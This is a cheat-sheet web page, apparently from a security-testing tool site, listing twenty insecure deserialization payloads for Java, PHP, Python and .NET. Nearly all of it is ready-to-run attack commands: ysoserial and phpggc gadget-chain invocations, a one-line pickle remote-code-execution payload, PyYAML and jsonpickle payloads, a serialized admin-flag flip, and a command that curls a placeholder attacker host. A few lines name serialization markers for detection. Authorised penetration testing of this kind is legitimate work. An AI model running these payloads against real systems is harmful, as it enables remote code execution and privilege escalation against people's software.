Insecure Deserialization Cheat Sheet

Insecure deserialization payloads for Java, PHP, Python, and .NET with gadget chains and tool commands. (20 payloads)

Java (ysoserial)

(6)

java -jar ysoserial.jar CommonsCollections1 "id"

Commons Collections 1 gadget chainJava

java -jar ysoserial.jar CommonsCollections6 "curl http://ATTACKER"

CC6 — works with newer commons-collectionsJava

java -jar ysoserial.jar URLDNS "http://ATTACKER/canary"

DNS callback detection (no RCE needed)Java

java -jar ysoserial.jar Spring1 "id"

Spring framework gadget chainJava

java -jar ysoserial.jar Jdk7u21 "id"

JDK 7u21 native gadget chainJava

Look for: rO0AB (base64) or aced0005 (hex) — Java serialized markers

Detection: Java serialization markers

PHP (phpggc)

(6)

phpggc Monolog/RCE1 system id

Monolog RCE gadget chainPHP

phpggc Laravel/RCE1 system id

Laravel RCE gadget chainPHP

phpggc Symfony/RCE1 system id

Symfony RCE gadget chainPHP

phpggc Guzzle/RCE1 system id

Guzzle RCE gadget chainPHP

Look for: O:4:"User" — PHP serialized object format

Detection: PHP serialization format

Modify s:5:"admin";b:0; → s:5:"admin";b:1;

Manual boolean flip in serialized data

Python (pickle)

(4)

import pickle,os;class E:__reduce__=lambda s:(os.system,('id',));pickle.dumps(E())

Pickle RCE via __reduce__Python

!!python/object/apply:os.system ["id"]

PyYAML unsafe_load RCEPython

{"py/reduce":[{"py/function":"os.system"},{"py/tuple":["id"]}]}

jsonpickle RCEPython

Look for: \x80\x04\x95 — Python pickle markers

Detection: pickle protocol markers

.NET (ysoserial.net)

(4)

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "id"

TypeConfuseDelegate gadget.NET

ysoserial.exe -g ObjectDataProvider -f Json.Net -o raw -c "id"

ObjectDataProvider for Json.Net.NET

ysoserial.exe -g WindowsIdentity -f BinaryFormatter -o base64 -c "id"

WindowsIdentity gadget (base64).NET

Look for: AAEAAAD// (base64) — .NET BinaryFormatter marker

Detection: .NET serialization markers

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Command Injection Insecure Deserialization

Related Cheat Sheets

Reverse Shell Cheat Sheet Command Injection Cheat Sheet

$loading...